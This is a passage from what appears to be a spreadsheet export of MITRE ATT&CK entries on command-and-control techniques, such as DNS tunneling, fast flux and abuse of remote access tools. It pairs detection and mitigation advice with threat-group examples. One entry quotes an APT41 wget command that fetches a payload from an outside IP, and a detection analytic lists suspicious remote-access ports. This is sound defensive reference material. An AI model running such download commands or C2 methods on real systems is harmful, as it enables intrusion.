[Shark](https://attack.mitre.org/software/S1019) can send DNS C2 communications using a unique domain generation algorithm.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can use a custom DGA to generate a subdomain for C2.(Citation: BlackBerry CostaRicto November 2020)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) has used a DGA to generate domain names for C2.(Citation: ProofPoint Ursnif Aug 2016)
ngrok
[ngrok](https://attack.mitre.org/software/S0508) can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.(Citation: Zdnet Ngrok September 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution.
Network Traffic Flow
In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used dynamic DNS service providers to host malicious domains.(Citation: District Court of NY APT10 Indictment December 2018)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has used fast flux DNS for its C2.(Citation: Korean FSI TA505 2020)
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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&lt;h4&gt;Analytic 1 - Suspicious Port Usage&lt;/h4&gt;
&lt;code&gt;suspicious_ports = filter network_traffic where ((protocol ="6" and (serverPort = 5938 or serverPort = 6568 or serverPort = 5650 or serverPort = 5655 or serverPort =5631)) or (protocol = "17" and (serverPort = 15000 and serverPort = 5632 )) or(httpHost = "remoteutilities.com"))&lt;/code&gt;
Process Creation
Monitor for applications and processes related to remote admin software. Correlate activity with other suspicious behavior that may reduce false positives if this type of software is used by legitimate users and administrators. [Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote software to compromised systems. It may be possible to detect or prevent the installation of this type of software with host-based solutions.
Execution Prevention
Use application control to mitigate installation and use of unapproved software that can be used for remote access.
Filter Network Traffic
Properly configure firewalls, application firewalls, and proxies to limit outgoing traffic to sites and services used by remote access software.
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to remote access services.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors installed the AnyDesk remote desktop application onto the compromised network.(Citation: DFIR Conti Bazar Nov 2021)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used AnyDesk to transfer tools between systems.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) directed victims to run remote monitoring and management (RMM) tools.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used several remote administration tools as persistent infiltration channels.(Citation: McAfee Night Dragon)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) used legitimate programs such as AmmyyAdmin and Team Viewer for remote interactive C2 to target systems.(Citation: Group-IB Anunak)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) used the Ammyy Admin tool as well as TeamViewer for remote access, including to preserve remote access if a Cobalt Strike module was lost.(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used DameWare Mini Remote Control for lateral movement.(Citation: Securelist DarkVishnya Dec 2018)
Evilnum
[EVILNUM](https://attack.mitre.org/software/S0568) has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.(Citation: ESET EvilNum July 2020)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has utilized the remote management tool Atera to download malware to a compromised system.(Citation: Mandiant FIN7 Apr 2022)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy [REvil](https://attack.mitre.org/software/S0496).(Citation: Tetra Defense Sodinokibi March 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a modified TeamViewer client as a command and control channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Crowdstrike GTR2020 Mar 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used a legitimate application, ScreenConnect, to manage systems remotely and move laterally.(Citation: Trend Micro Muddy Water March 2021)(Citation: Anomali Static Kitten February 2021) 
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has installed TeamViewer on targeted systems.(Citation: Secureworks BRONZE PRESIDENT December 2019)
RTM
[RTM](https://attack.mitre.org/groups/G0048) has used a modified version of TeamViewer and Remote Utilities for remote access.(Citation: Group IB RTM August 2019)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used remote administration tools or remote industrial control system client software for execution and to maliciously release electricity breakers.(Citation: US-CERT Ukraine Feb 2016)(Citation: Microsoft Prestige ransomware October 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)(Citation: Cisco Talos Intelligence Group)
Thrip
[Thrip](https://attack.mitre.org/groups/G0076) used a cloud-based remote access software called LogMeIn for their attacks.(Citation: Symantec Thrip June 2018)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) has a plugin for VNC and Ammyy Admin Tool.(Citation: FireEye CARBANAK June 2017)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) contains a module for VNC.(Citation: Dell Dridex Oct 2015)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has checked for the LogMein event log in an attempt to encrypt files in remote machines.(Citation: Cyble Egregor Oct 2020)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has established tmate sessions for C2 communications.(Citation: Unit 42 Hildegard Malware)
RTM
[RTM](https://attack.mitre.org/software/S0148) has the capability to download a VNC module from command and control (C2).(Citation: ESET RTM Feb 2017)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) uses vncDll module to remote control the victim machine.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used IRC for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Phosphorus November 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) issued wget requests from infected systems to the C2.(Citation: Talos Rocke August 2018)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used an IRC bot for C2 communications.(Citation: Trend Micro TeamTNT)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to use Telnet for communication.(Citation: Trend Micro DRBControl February 2020)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used an IRC channel for C2 communications.(Citation: Unit 42 Hildegard Malware)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server.(Citation: Unit 42 Lucifer June 2020)
NETEAGLE
Adversaries can also use [NETEAGLE](https://attack.mitre.org/software/S0034) to establish an RDP connection with a controller over TCP/7519.
QUIETEXIT
[QUIETEXIT](https://attack.mitre.org/software/S1084) can use an inverse negotiated SSH connection as part of its C2.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) connects to an IRC server for C2.(Citation: Unit 42 Siloscape Jun 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts.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Filter Network Traffic
Consider filtering network traffic to untrusted or known bad domains and resources. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. 
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) used SSH tunneling in targeted environments.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
CostaRicto
During [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.(Citation: BlackBerry CostaRicto November 2020) 
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has encapsulated [Cobalt Strike](https://attack.mitre.org/software/S0154)'s C2 protocol in DNS and HTTPS.(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used the Plink utility to create SSH tunnels.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized web shells and Java tools for tunneling capabilities to and from compromised assets.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used protocol tunneling for communication and RDP activity on compromised hosts through the use of open source tools such as [ngrok](https://attack.mitre.org/software/S0508) and custom tool SSHMinion.(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used protocol tunneling to further conceal C2 communications and infrastructure.(Citation: CISA AA21-200A APT40 July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used Plink to tunnel RDP over SSH.(Citation: DFIR Phosphorus November 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used the Plink utility and other tools to create tunnels to C2 servers.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use DNS over HTTPS for C2.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Cobalt Strike Manual 4.3 November 2020)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can use DNS over HTTPS (DoH) to resolve C2 nodes.(Citation: Trend Micro Cyclops Blink March 2022)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) uses a custom command and control protocol that communicates over commonly used ports, and is frequently encapsulated by application layer protocols.(Citation: Symantec W32.Duqu)
FLIPSIDE
[FLIPSIDE](https://attack.mitre.org/software/S0173) uses RDP to tunnel traffic from a victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can connect to HTTP proxies via TCP to create a tunnel to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.(Citation: SentinelOne Aoqin Dragon June 2022)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) attempts to perform an HTTP CONNECT via an internal proxy to establish a tunnel.(Citation: Dragos Crashoverride 2017)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)
Milan
[Milan](https://attack.mitre.org/software/S1015) can use a custom protocol tunneled through DNS or HTTP.(Citation: Kaspersky Lyceum October 2021)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) can use SOCKS proxies to tunnel traffic through another protocol.(Citation: Mythc Documentation)
QakBot
The [QakBot](https://attack.mitre.org/software/S0650) proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.(Citation: Kaspersky QakBot September 2021)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has the ability to communicate over custom communications methodologies that ride over common network protocols including raw TCP and UDP sockets, HTTP, SMTP, and DNS.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
ngrok
[ngrok](https://attack.mitre.org/software/S0508) can tunnel RDP and other services securely over internet connections.(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)(Citation: MalwareBytes Ngrok February 2020)(Citation: Trend Micro Ngrok September 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for DNS over TLS (DoT) and DNS over HTTPS (DoH),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for DNS traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Filter Network Traffic
Consider filtering DNS requests to unknown, untrusted, or known bad domains and resources. Resolving DNS requests with on-premise/proxy servers may also disrupt adversary attempts to conceal data within DNS packets. 
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. 
APT18
[APT18](https://attack.mitre.org/groups/G0026) uses DNS for C2 communications.(Citation: PaloAlto DNS Requests May 2016)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used remote access tools that leverage DNS in communications with C2.(Citation: BitDefender Chafer May 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) 
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to encapsulate C2 in DNS traffic.(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used DNS tunneling for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has performed C2 using DNS via A, OPT, and TXT records.(Citation: FireEye FIN7 Aug 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) malware RoyalDNS has used DNS for C2.(Citation: NCC Group APT15 Alive and Strong)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has leveraged dynamic DNS providers for C2 communications.(Citation: MalwareBytes LazyScripter Feb 2021) 
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used DNS for C2 including the publicly available &lt;code&gt;requestbin.net&lt;/code&gt; tunneling service.(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Webinar Dec 2017)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081)'s backdoor has communicated to the C2 over the DNS protocol.(Citation: TrendMicro Tropic Trooper May 2020)	
Anchor
Variants of [Anchor](https://attack.mitre.org/software/S0504) can use DNS tunneling to communicate with C2.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) can use DNS and TXT records within its DNS tunneling protocol for command and control.(Citation: Palo Alto OilRig Sep 2018)
Brute Ratel C4
[Brute Ratel C4](https://attack.mitre.org/software/S1063) can use DNS over HTTPS for C2.(Citation: Palo Alto Brute Ratel July 2022)(Citation: Trend Micro Black Basta October 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)	
Cobian RAT
[Cobian RAT](https://attack.mitre.org/software/S0338) uses DNS for C2.(Citation: Zscaler Cobian Aug 2017)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use use IPv4 A records and IPv6 AAAA DNS records in C2 communications.(Citation: SecureWorks August 2019)
Denis
[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)
DnsSystem
[DnsSystem](https://attack.mitre.org/software/S1021)  can direct queries to custom DNS servers and return C2 commands using TXT records.(Citation: Zscaler Lyceum DnsSystem June 2022)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has used DNS requests over UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)	
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use DNS in communication with C2.(Citation: ESET Gelsemium June 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)	
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can use DNS for C2 communications.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021)
HTTPBrowser
[HTTPBrowser](https://attack.mitre.org/software/S0070) has used DNS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) can use DNS for C2.(Citation: Palo Alto OilRig May 2016)
Heyoka Backdoor
[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use DNS tunneling for C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has used a custom implementation of DNS tunneling to embed C2 communications in DNS requests and replies.(Citation: ESET InvisiMole June 2020)
Kevin
Variants of [Kevin](https://attack.mitre.org/software/S1020) can communicate over DNS through queries to the server for constructed domain names with embedded information.(Citation: Kaspersky Lyceum October 2021)
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) uses DNS for C2.(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)
Milan
[Milan](https://attack.mitre.org/software/S1015) has the ability to use DNS for C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021)(Citation: Accenture Lyceum Targets November 2021)
Mori
[Mori](https://attack.mitre.org/software/S1047) can use DNS tunneling to communicate with C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports DNS-based C2 profiles.(Citation: Mythc Documentation)	
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) uses DNS for the C2 communications.(Citation: fsecure NanHaiShu July 2016)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can use a DNS tunneling plugin to exfiltrate data by adding it to the subdomain portion of a DNS request.(Citation: MoustachedBouncer ESET August 2023)
POWERSOURCE
[POWERSOURCE](https://attack.mitre.org/software/S0145) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)
POWRUNER
[POWRUNER](https://attack.mitre.org/software/S0184) can use DNS for C2 communications.(Citation: FireEye APT34 Dec 2017)(Citation: FireEye APT34 Webinar Dec 2017)
Pisloader
[Pisloader](https://attack.mitre.org/software/S0124) uses DNS as its C2 protocol.(Citation: Palo Alto DNS Requests)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can be configured to use DNS for command and control.(Citation: Dell TG-3390)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has used DNS to communicate with the C2.(Citation: Unit42 RDAT July 2020)	
Remsec
[Remsec](https://attack.mitre.org/software/S0125) is capable of using DNS for C2.(Citation: Symantec Remsec IOCs)(Citation: Kaspersky ProjectSauron Full Report)(Citation: Kaspersky ProjectSauron Technical Analysis)
SOUNDBITE
[SOUNDBITE](https://attack.mitre.org/software/S0157) communicates via DNS for C2.(Citation: FireEye APT32 May 2017)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) used DNS for C2 traffic designed to mimic normal SolarWinds API communications.(Citation: FireEye SUNBURST Backdoor December 2020)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has used DNS tunneling for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)
Shark
[Shark](https://attack.mitre.org/software/S1019) can use DNS in C2 communications.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can support C2 communications over DNS.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver C2 DNS)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can communicate over DNS with the C2 server.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has used DNS TXT requests as for its C2 communication.(Citation: Lunghi Iron Tiger Linux)
TEXTMATE
[TEXTMATE](https://attack.mitre.org/software/S0146) uses DNS TXT records for C2.(Citation: FireEye FIN7 March 2017)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has encoded outbound C2 communications in DNS requests consisting of character strings made to resemble standard domain names. The actual information transmitted by [Uroburos](https://attack.mitre.org/software/S0022) is contained in the part of the character string prior to the first ‘.’ character.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)
</t>
  </si>
  <si>
    <t>Network Traffic Content
Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic,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for web traffic to/from known-bad or suspicious domains and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Network Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. 
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) used [BlackEnergy](https://attack.mitre.org/software/S0089) to communicate between compromised hosts and their command-and-control servers via HTTP post requests. (Citation: Booz Allen Hamilton)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads.(Citation: Mandiant APT41)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used HTTP for C2 communications.(Citation: Costa AvosLocker May 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used HTTP for some of their C2 communications.(Citation: FireEye APT29 Nov 2018)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used HTTP GET requests for C2.(Citation: Talos Frankenstein June 2019)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used HTTP for C2.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors enabled HTTP and HTTPS listeners.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) uses HTTP and HTTPS to contact actor-controlled C2 servers.(Citation: McAfee Lazarus Jul 2020) 
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors’ XServer tool communicated using HTTP and HTTPS.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds)
APT18
[APT18](https://attack.mitre.org/groups/G0026) uses HTTP for C2 communications.(Citation: PaloAlto DNS Requests May 2016)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used HTTP for C2 communications. [APT19](https://attack.mitre.org/groups/G0073) also used an HTTP malware variant to communicate over HTTP for C2.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016)
APT28
Later implants used by [APT28](https://attack.mitre.org/groups/G0007), such as [CHOPSTICK](https://attack.mitre.org/software/S0023), use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration.(Citation: FireEye APT28)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Cobalt Kitty 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used HTTP for command and control.(Citation: Symantec Elfin Mar 2019)
APT37
[APT37](https://attack.mitre.org/groups/G0067) uses HTTPS to conceal C2 communications.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) 
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has used HTTP POST requests for C2.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) malware has used HTTP for C2.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used HTTPS for C2 communications.(Citation: NCC Group Chimera January 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used HTTP for C2 communications.(Citation: Uptycs Confucius APT Jan 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070)'s version of [Bandook](https://attack.mitre.org/software/S0234) communicates with their server over a TCP port using HTTP payloads Base64 encoded and suffixed with the string “&amp;&amp;&amp;”.(Citation: Lookout Dark Caracal Jan 2018)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used HTTP POST requests to transmit data.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used HTTPS for command and control.(Citation: Bitdefender FIN8 July 2021)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used HTTP and HTTPS for C2 communications.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: CERT-EE Gamaredon January 2021)(Citation: Unit 42 Gamaredon February 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used open-source C2 frameworks, including Covenant.(Citation: Microsoft HAFNIUM March 2020)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)
Inception
